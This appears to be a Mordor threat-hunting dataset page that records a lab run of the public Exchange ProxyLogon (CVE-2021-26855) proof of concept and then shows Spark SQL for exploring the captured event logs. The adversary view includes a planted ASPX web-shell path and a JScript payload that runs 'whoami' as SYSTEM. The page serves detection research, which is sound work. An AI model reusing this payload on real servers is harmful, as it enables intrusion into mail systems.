Exchange ProxyLogon SSRF RCE Vuln POC

Metadata

Author

Roberto Rodriguez @Cyb3rWard0g

Creation Date

2021/03/14

Modification Date

2021/03/14

Tactics

[‘TA0003’, ‘TA0002’]

Techniques

[‘T1505.003’]

Tags

None

Dataset Description

This dataset represents the execution of a public POC to abuse Exchange vulnerabilities (CVE-2021-26855 server-side request forgery (SSRF) vulnerability)

Notebooks

Notebooks created by the community leveraging the mordor datasets

Author

Name

Link

Simulation Plan

Environment

Tool Type

Module

Lab VM

Manual

cmd

Adversary View

C:\Users\wardog.MXS01\Documents>
C:\Users\wardog.MXS01\Documents>python public-poc.py localhost wardog@azsentinel.local
Attacking target localhost
=============================
Got DN: /o=azsentinel/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Recipients/cn=6beef80bd6d14a68b9ae39df7f27a8cc-wardog
Got SID: S-1-5-21-594047938-393122191-2580508586-500
Got session id: e243cd06-1093-40d4-829c-63f3b9caea9b
Got canary: pYoEXlKOqkGQMt3Dv3qJUExebVlG6NgI3c_XeQNd-VRV8lo6E5zskoLPJB0uOOGITLTC08eVUkk.
Got OAB id: becafe73-b0c1-4f36-8df4-85f682840ef4
Ready!

Testing command:
===============
POST  shell:https://localhost/owa/auth/ohyeah.aspx
code":"Response.Write(new ActiveXObject("WScript.Shell").exec("cmd /c whoami").StdOut.ReadAll());


[*] Waiting for ohyeah.aspx to be available..
[*] Waiting for ohyeah.aspx to be available..

Results:
========
nt authority\system


C:\Users\wardog.MXS01\Documents>

Explore Mordor Dataset

Initialize Analytics Engine

from openhunt.mordorutils import *
spark = get_spark()

Download & Process Mordor File

mordor_file = "https://raw.githubusercontent.com/OTRF/mordor/master/datasets/small/windows/persistence/host/proxylogon_ssrf_rce_poc.zip"
registerMordorSQLTable(spark, mordor_file, "mordorTable")
[+] Processing a Spark DataFrame..
[+] DataFrame Returned !
[+] Temporary SparkSQL View: mordorTable 

Get to know your data

df = spark.sql(
'''
SELECT Hostname,Channel,EventID, Count(*) as count
FROM mordorTable
GROUP BY Hostname,Channel,EventID
ORDER BY count DESC
'''
)
df.show(truncate=False)
+----------------------+---------------------------------------------------+-------+-----+
|Hostname              |Channel                                            |EventID|count|
+----------------------+---------------------------------------------------+-------+-----+
|MXS01.azsentinel.local|Microsoft-Windows-Sysmon/Operational               |10     |3626 |
|MXS01.azsentinel.local|Security                                           |4658   |2398 |
|MXS01.azsentinel.local|Security                                           |4656   |1199 |
|MXS01.azsentinel.local|Security                                           |4690   |1199 |
|MXS01.azsentinel.local|Microsoft-Windows-Sysmon/Operational               |7      |427  |
|MXS01.azsentinel.local|Microsoft-Windows-Sysmon/Operational               |11     |301  |
|MXS01.azsentinel.local|Microsoft-Exchange-ActiveMonitoring/MonitorResult  |3      |293  |
|MXS01.azsentinel.local|Microsoft-Exchange-ActiveMonitoring/ResponderResult|4      |167  |
|MXS01.azsentinel.local|Security                                           |5156   |132  |
|MXS01.azsentinel.local|Microsoft-Windows-Sysmon/Operational               |12     |120  |
|MXS01.azsentinel.local|Microsoft-Windows-Sysmon/Operational               |3      |117  |
|MXS01.azsentinel.local|Security                                           |5158   |85   |
|MXS01.azsentinel.local|Security                                           |4703   |72   |
|MXS01.azsentinel.local|Microsoft-Exchange-ActiveMonitoring/ProbeResult    |2      |57   |
|MXS01.azsentinel.local|Microsoft-Windows-Sysmon/Operational               |13     |37   |
|MXS01.azsentinel.local|Security                                           |4627   |21   |
|MXS01.azsentinel.local|Security                                           |4624   |21   |
|MXS01.azsentinel.local|Security                                           |4985   |18   |
|MXS01.azsentinel.local|Application                                        |2303   |17   |
|MXS01.azsentinel.local|Security                                           |4663   |16   |
+----------------------+---------------------------------------------------+-------+-----+
only showing top 20 rows